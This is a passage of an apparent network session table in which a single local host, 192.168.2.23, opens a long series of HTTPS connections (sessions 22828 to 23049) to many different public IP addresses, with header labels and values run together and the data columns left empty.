                                                22828192.168.2.233349284.219.155.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22829192.168.2.236030023.29.253.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22830192.168.2.2354308161.156.135.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22831192.168.2.233346251.46.185.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22832192.168.2.235057617.52.142.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22833192.168.2.235936254.42.114.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22834192.168.2.235395813.89.204.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22835192.168.2.233417436.65.99.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22836192.168.2.2355192160.201.90.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22837192.168.2.234187639.253.160.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22838192.168.2.2352636103.248.227.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22839192.168.2.2347594150.208.186.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22840192.168.2.2357220110.208.199.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22841192.168.2.234327451.106.222.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22842192.168.2.2354986209.76.188.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22843192.168.2.234687847.249.200.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22844192.168.2.2337794187.75.250.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22845192.168.2.235321063.47.122.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22846192.168.2.2342588213.128.53.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22847192.168.2.235146078.69.149.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22848192.168.2.235972495.20.244.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22849192.168.2.2336104196.177.115.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22850192.168.2.235113627.194.50.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22851192.168.2.2353446118.12.82.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22852192.168.2.2334492152.174.101.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22853192.168.2.2336964151.159.226.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22854192.168.2.235364461.189.248.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22855192.168.2.2352314161.149.130.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22856192.168.2.2353318185.5.161.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22857192.168.2.2353070138.104.64.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22858192.168.2.233657244.213.234.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22859192.168.2.2347742119.105.19.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22860192.168.2.2337194107.171.169.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22861192.168.2.2358426125.197.173.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22862192.168.2.2334354131.189.233.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22863192.168.2.2359170196.121.11.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22864192.168.2.234199269.96.138.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22865192.168.2.2356856143.247.55.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22866192.168.2.23465945.192.72.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22867192.168.2.236032642.151.251.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22868192.168.2.2344560172.151.112.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22869192.168.2.235950036.251.74.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22870192.168.2.2356572199.142.208.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22871192.168.2.235067081.243.148.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22872192.168.2.234423293.158.248.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22873192.168.2.2350884125.115.118.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22874192.168.2.23523401.123.96.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22875192.168.2.234284836.50.195.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22876192.168.2.2358812103.228.132.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22877192.168.2.234877468.103.165.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22878192.168.2.2356612169.102.144.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22879192.168.2.2339106135.203.78.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22880192.168.2.234257881.101.36.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22881192.168.2.2346424195.186.167.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22882192.168.2.2337336139.212.84.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22883192.168.2.235977293.50.177.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22884192.168.2.234366093.226.145.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22885192.168.2.2336642205.22.31.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22886192.168.2.2346590136.21.84.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22887192.168.2.234877235.129.139.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22888192.168.2.2356254185.89.247.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22889192.168.2.2353180168.86.102.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22890192.168.2.2348428148.55.5.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22891192.168.2.2356176186.14.202.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22892192.168.2.235566063.226.166.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22893192.168.2.234098291.190.242.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22894192.168.2.2340734118.58.255.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22895192.168.2.2357480203.236.251.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22896192.168.2.2353304152.240.46.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22897192.168.2.2356244195.84.114.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22898192.168.2.234242057.1.149.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22899192.168.2.234714017.169.89.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22900192.168.2.235812225.197.186.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22901192.168.2.2357166177.211.100.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22902192.168.2.2348108196.0.212.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22903192.168.2.236078087.149.75.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22904192.168.2.2356430202.87.250.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22905192.168.2.2348382137.107.201.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22906192.168.2.233731632.184.249.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22907192.168.2.233741699.9.144.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22908192.168.2.2339886116.151.201.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22909192.168.2.23354709.190.168.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22910192.168.2.234412471.68.115.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22911192.168.2.234899671.168.109.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22912192.168.2.235380848.15.47.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22913192.168.2.233450213.26.81.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22914192.168.2.2337708133.135.28.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22915192.168.2.2357314120.210.48.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22916192.168.2.233706899.112.32.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22917192.168.2.2355994121.152.134.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22918192.168.2.2352766113.10.201.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22919192.168.2.2334204197.97.117.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22920192.168.2.234234895.73.28.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22921192.168.2.233449861.123.94.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22922192.168.2.235663071.203.206.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22923192.168.2.2336614186.8.200.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22924192.168.2.233317264.15.226.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22925192.168.2.2346932105.91.107.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22926192.168.2.23346548.199.234.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22927192.168.2.2345444223.12.137.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22928192.168.2.2349640144.76.75.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22929192.168.2.2332806133.49.130.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22930192.168.2.2353914222.159.132.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22931192.168.2.2333224162.32.21.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22932192.168.2.2345934122.154.220.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22933192.168.2.235328435.181.48.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22934192.168.2.235363631.97.39.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22935192.168.2.2360746151.138.97.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22936192.168.2.234693059.17.197.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22937192.168.2.2348102207.223.122.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22938192.168.2.2349108120.223.81.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22939192.168.2.2341040137.115.102.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22940192.168.2.2344804173.6.28.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22941192.168.2.23479141.223.6.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22942192.168.2.2355472205.145.219.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22943192.168.2.2337984145.6.223.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22944192.168.2.2349436180.19.104.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22945192.168.2.234860238.110.77.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22946192.168.2.2341610196.234.119.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22947192.168.2.2349668209.193.93.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22948192.168.2.2353248114.61.205.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22949192.168.2.2348048162.10.91.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22950192.168.2.234528061.20.209.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22951192.168.2.2340000142.120.208.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22952192.168.2.233558872.162.148.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22953192.168.2.235174059.36.5.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22954192.168.2.2354480213.97.188.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22955192.168.2.234004641.62.173.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22956192.168.2.2359700113.175.3.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22957192.168.2.2339400114.194.27.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22958192.168.2.2353364180.49.52.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22959192.168.2.235558875.243.208.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22960192.168.2.235965848.121.183.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22961192.168.2.235313472.90.216.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22962192.168.2.23482521.195.168.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22963192.168.2.234378645.123.199.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22964192.168.2.2336706223.190.26.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22965192.168.2.2352362158.169.24.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22966192.168.2.234746462.91.193.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22967192.168.2.2349094131.147.173.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22968192.168.2.2346798213.119.228.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22969192.168.2.235571240.199.86.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22970192.168.2.2349006119.217.173.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22971192.168.2.2353560101.228.201.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22972192.168.2.234139218.255.165.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22973192.168.2.235803699.89.212.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22974192.168.2.233586493.37.82.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22975192.168.2.233350452.130.42.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22976192.168.2.234250671.6.19.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22977192.168.2.2347360133.208.226.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22978192.168.2.2354564196.240.202.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22979192.168.2.2333098160.205.239.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22980192.168.2.2350654133.31.8.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22981192.168.2.234362879.109.210.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22982192.168.2.235731213.117.3.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22983192.168.2.2350576193.95.241.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22984192.168.2.2342458184.241.137.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22985192.168.2.2360748220.35.70.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22986192.168.2.2347670218.152.200.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22987192.168.2.234895479.104.179.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22988192.168.2.2354220125.82.27.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22989192.168.2.23398744.40.223.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22990192.168.2.2341644102.87.95.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22991192.168.2.2335942210.79.92.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22992192.168.2.2338426111.186.212.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22993192.168.2.234249481.201.1.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22994192.168.2.2358966154.237.147.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22995192.168.2.2355442187.155.34.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22996192.168.2.233445480.219.0.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22997192.168.2.2355780209.76.226.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22998192.168.2.2360254145.140.225.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22999192.168.2.233564219.236.202.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23000192.168.2.2336416220.255.246.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23001192.168.2.234950080.71.0.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23002192.168.2.235065072.6.134.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23003192.168.2.235196827.233.78.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23004192.168.2.234606870.106.67.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23005192.168.2.233337899.178.253.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23006192.168.2.2339690193.121.232.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23007192.168.2.2360196132.42.15.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23008192.168.2.2344556221.196.157.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23009192.168.2.2345994201.27.146.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23010192.168.2.235034088.196.169.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23011192.168.2.2351904132.2.203.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23012192.168.2.2338172171.227.129.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23013192.168.2.233383243.60.22.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23014192.168.2.2343926220.14.47.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23015192.168.2.235081861.162.66.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23016192.168.2.2336230191.71.117.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23017192.168.2.2335144204.11.155.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23018192.168.2.2341414143.98.146.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23019192.168.2.2342730179.106.45.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23020192.168.2.2353500108.213.147.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23021192.168.2.2352194188.188.205.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23022192.168.2.234195660.131.11.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23023192.168.2.233842427.241.149.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23024192.168.2.2338236144.68.73.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23025192.168.2.2339410168.208.179.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23026192.168.2.235175693.97.49.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23027192.168.2.235930857.168.181.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23028192.168.2.234868676.17.47.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23029192.168.2.2335572132.212.166.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23030192.168.2.2350260180.15.41.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23031192.168.2.2343818176.43.60.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23032192.168.2.2346130100.131.86.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23033192.168.2.2358386144.194.237.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23034192.168.2.2355574202.179.159.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23035192.168.2.2344804198.84.21.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23036192.168.2.233559460.35.250.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23037192.168.2.2338392210.169.27.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23038192.168.2.2346610144.219.146.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23039192.168.2.2334578108.225.26.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23040192.168.2.234578488.110.129.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23041192.168.2.235863634.200.158.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23042192.168.2.2339178164.107.3.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23043192.168.2.2341044199.209.108.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23044192.168.2.2354218121.128.18.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23045192.168.2.2360168220.250.104.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23046192.168.2.2345740110.52.156.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23047192.168.2.2333390178.191.236.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23048192.168.2.2342284223.10.212.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23049192.168.2.233957476.80.83.46443
                                                TimestampBytes transferredDirectionData


